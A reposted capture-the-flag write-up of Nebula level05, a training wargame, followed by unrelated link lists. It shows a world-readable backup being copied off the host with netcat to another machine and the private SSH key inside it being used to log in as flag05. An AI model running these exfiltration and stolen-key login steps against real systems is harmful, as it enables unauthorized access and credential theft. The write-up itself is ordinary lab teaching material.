Nebula: level05
来源:互联网 发布:赤龙服淘宝 编辑:程序博客网 时间:2024/05/17 08:41
exploit-exercises Nebula: level05
This is the write-up for level05 of Nebula wargame. We are told to check the flag05 home directory and look for weak permissions.
level05@nebula:/home/flag05$ ls -laWorld readable backup! Checking the directory content, we find a gzipped tar archive.
total 28
drwxr-x--- 4 flag05 level05 4096 2011-11-20 21:22 .
drwxr-xr-x 43 root root 4096 2012-10-14 07:20 ..
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .backup
-rw-r--r-- 1 flag05 flag05 220 2011-05-18 02:54 .bash_logout
-rw-r--r-- 1 flag05 flag05 3353 2011-05-18 02:54 .bashrc
-rw-r--r-- 1 flag05 flag05 675 2011-05-18 02:54 .profile
drwx------ 2 flag05 flag05 4096 2011-11-20 20:13 .ssh
level05@nebula:/home/flag05$ ls -la .backup/We copy that to our local machine using netcat.
total 12
drwxr-xr-x 2 flag05 flag05 4096 2011-11-20 20:13 .
drwxr-x--- 5 flag05 level05 4096 2012-10-14 10:47 ..
-rw-rw-r-- 1 flag05 flag05 1826 2011-11-20 20:13 backup-19072011.tgz
kroosec@dojo:~$ nc -l 2000 > /tmp/backup.tgz
level05@nebula:/home/flag05$ nc 192.168.1.51 2000 < backup-19072011.tgzAnd extract the archive with tar utility.
kroosec@dojo:~/tmp$ tar zxvf /tmp/backup.tgzAn ssh key, just there, waiting to be used. We can use that to login with the flag05 user account.
.ssh/
.ssh/id_rsa.pub
.ssh/id_rsa
.ssh/authorized_keys
kroosec@dojo:~/test$ ssh flag05@192.168.1.3 -i .ssh/id_rsaAnd run getflag!
flag05@nebula:~$ getflag
You have successfully executed getflag on a target account
Posted 29th October 2012 by Hani Benhabiles
Labels: challenge exploit-exercises Linux nebula wargame
http://www.kroosec.com/2012/10/nebula-level05.html
http://www.kroosec.com/2012/10/nebula-level05.html
0 0
- Nebula level05
- Nebula: level05
- Nebula
- nebula 0
- Nebula level00
- Nebula level01
- Nebula level02
- Nebula level04
- Nebula level03
- Nebula level06
- Nebula level07
- Nebula level08
- Nebula level09
- Nebula level10
- Nebula level11
- Nebula level12
- Nebula level13
- Nebula level14
- 10763 - Foreign Exchange
- hdu1520 树形DP
- name 'patterns' is not defined 错误解决方法
- 游戏开发之橙子引擎尚韬:蓝海破冰 重新定义TV游戏
- 线程
- Nebula: level05
- OpenWRT开发链接收藏(不定时更新)
- 《鸟哥的Linux私房菜》读书笔记1
- JavaScript跨域总结与解决办法
- Unity编辑器中光照贴图背后的PowerVR光线追踪技术
- Xcode SVN 报错 The server certificate failed to verify.
- AdaBoost装袋提升算法
- Using MQTT in Android mobile applications
- Oracle sqlplus